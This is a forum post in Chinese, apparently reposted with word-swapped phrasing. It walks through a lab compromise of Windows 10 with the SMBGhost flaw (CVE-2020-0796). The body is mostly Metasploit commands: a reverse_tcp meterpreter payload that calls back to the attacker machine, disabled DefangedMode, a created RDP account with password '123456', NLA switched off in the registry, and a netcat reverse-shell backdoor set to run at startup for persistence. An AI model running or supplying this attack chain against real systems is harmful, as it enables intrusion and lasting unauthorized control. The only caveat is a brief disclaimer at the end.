ToB企服应用市场:ToB评测及商务社交产业平台
标题:
掌握安全渗透测试:利用永恒之黑漏洞获取Windows 10体系访问权限
[打印本页]
作者:
鼠扑
时间:
2024-7-28 20:01
标题:
掌握安全渗透测试:利用永恒之黑漏洞获取Windows 10体系访问权限
以下是利用永恒之黑漏洞对Windows 10举行渗透测试的步骤:
环境介绍
靶机
:IP地址为192.168.1.60,运行Windows 10 1903版本。
攻击机
:IP地址为192.168.1.53。
靶机准备
检查Windows 10版本号
:确保靶机运行的Windows 10版本受到永恒之黑漏洞(CVE-2020-0796 SMBGhost)的影响。
检查体系补丁
:确认靶机未安装补丁KB4551762,该补丁修复了永恒之黑漏洞。
开启445端口
:确保靶机的445端口(SMB协议)是开放的。
获取Shell
利用Metasploit框架
:
启动Metasploit:msfconsole。
利用永恒之黑漏洞模块:use exploit/windows/smb/cve_2020_0796_smbghost。
设置选项
:
显示模块选项:show options。
设置目标主机IP:set RHOSTS 192.168.1.60。
设置payload:set payload windows/x64/meterpreter/reverse_tcp。
设置攻击机监听IP:set LHOST 192.168.1.53。
禁用模仿模式:set DefangedMode false。
执行exploit
:
运行exploit:exploit。
创建新用户并开启远程桌面
开启RDP远程桌面
:
利用Metasploit的post/windows/manage/enable_rdp模块开启RDP服务,并创建新用户。
创建RDP用户
:
设置用户名和密码:set username xuegod 和 set password 123456。
指定会话ID:set session 1。
运行模块:run。
检查NLA设置
:
查询注册表以确定是否开启网络级身份验证(NLA)。
关闭NLA
(假如开启):
修改注册表值SecurityLayer和UserAuthentication为0,以允许非NLA的RDP毗连。
毗连远程桌面
:
在Kali上利用rdesktop下令毗连到靶机的远程桌面:rdesktop 192.168.1.60。
开启后门维持权限访问
配置后门程序
:
上传nc(Netcat)到Windows 10体系。
修改注册表添加启动项,以便在体系启动时执行nc反弹shell下令。
设置防火墙规则
:
允许443端口的网络访问,以使后门有效。
重启Windows 10
:
重启靶机以应用更改,并等待后门程序运行。
毗连后门
:
在Kali上利用nc下令毗连后门:nc -v 192.168.1.60 443。
MSF控制台毗连
(可选):
在Metasploit框架中利用connect下令毗连到后门:connect 192.168.1.60 443。
总结
文档提供了利用永恒之黑漏洞对Windows 10举行渗透的具体步骤,包括获取初始访问、创建远程桌面用户、开启后门以及维持权限访问。
请注意,这些步骤仅供教诲目标,实际操作应在授权的渗透测试和安全研究环境中举行。未经授权的渗透测试大概违反法律。
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
欢迎光临 ToB企服应用市场:ToB评测及商务社交产业平台 (https://dis.qidao123.com/)
Powered by Discuz! X3.4